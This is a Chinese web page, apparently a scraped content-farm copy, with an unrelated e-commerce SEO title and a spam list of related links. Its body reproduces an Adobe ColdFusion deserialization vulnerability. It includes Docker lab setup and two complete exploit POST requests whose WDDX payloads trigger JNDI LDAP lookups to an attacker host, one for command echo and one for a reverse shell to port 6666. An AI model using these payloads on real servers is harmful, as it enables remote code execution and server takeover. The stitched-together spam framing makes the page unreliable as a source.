当前位置: 首页 > news >正文

怎样做境外电商贵阳网站优化公司

news 2025/7/18 7:03:34
怎样做境外电商,贵阳网站优化公司,汕头网站搭建,众筹网站建设报价0x01 产品简介 Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。 0x02 漏洞概述 Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击…

0x01 产品简介

      Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。

0x02 漏洞概述

     Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。

0x03 影响范围

    ColdFusion 2018 <= Update 16 

    ColdFusion 2021 <= Update 6 

    ColdFusion 2023 GA Release (2023.0.0.330468)

0x04 复现环境

 docker搭建ColdFusion 2023.0.0.330468漏洞环境

拉取镜像

docker pull vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

启动环境

docker run -d -P vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

 PS:需确认8080对应的端口

验证是否可访问环境

0x05 漏洞复现

exp

POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
cmd: idargumentCollection=
<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://your-ip:1389/Basic/TomcatEcho</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data>
</wddxPacket>

PS:本次复现需要使用jndi漏洞利用工具(JNDIExploit-1.4-SNAPSHOT.jar)

TomcatEcho回显链

 开启监听

反弹shell

利用链:

POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencodedargumentCollection=
<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://vpsip:1389/Basic/ReverseShell/vpsip/6666</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data>
</wddxPacket>

 

 0x06 修复建议

根据影响版本中的信息,建议相关用户尽快更新至安全版本:

ColdFusion 2018 Update 17

ColdFusion 2021 Update 7

ColdFusion 2023 Update 1

下载链接请参考:

https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html

http://www.zhongyajixie.com/news/36024.html

相关文章:

  • 上海做家庭影院的公司网站百度搜不干净的东西
  • 专做网站漏扫的工具今日西安头条最新消息
  • 做搜狗手机网站优化首国际新闻最新消息十条
  • 学生做网站怎么收费线上商城推广软文
  • 做电商网站的感想搜索引擎优化seo专员
  • 铁岭做网站的网站建设对企业品牌价值提升的影响
  • 怎么网站后台深圳百度公司地址在哪里
  • 建设网站对服务器有什么要求吗信息流推广主要具有哪两大优势
  • 企业开发网站建设哪家好东莞关键词自动排名
  • 东莞做企业网站一站式发稿平台
  • 网站成立查询品牌运营策略
  • php实现网站消息推送月入百万的游戏代理
  • 网络服务器配置与管理考试题咸阳seo
  • discuz企业网站模板关键词收录
  • 网站用社交图标做链接侵权吗百度广告多少钱
  • 网站平台构建优化模型有哪些
  • 织梦政府网站源码网站交易平台
  • 广饶网站设计数字化营销
  • 只做旧房翻新的装修公司seo网站关键词优化软件
  • 秦皇岛网站制作多少钱排名软件
  • pc端手机网站 viewport 自适应网络营销实训个人总结
  • 邢台做网站建设优化制作公司金信一条龙seo赚钱方式
  • 会计安全优化大师下载
  • 乐山 网站建设友情链接批量查询
  • 有哪些做淘宝素材的网站有哪些中国第三波疫情将在9月份
  • 上海企业登记在线服务平台专业seo站长工具全面查询网站
  • boroda wordpress 1.5青岛seo优化
  • 一个月宽带怎么办理武汉网优化seo公司
  • b站视频推广费用一般多少怎样做好竞价推广
  • 怎样做游戏网站合肥百度seo代理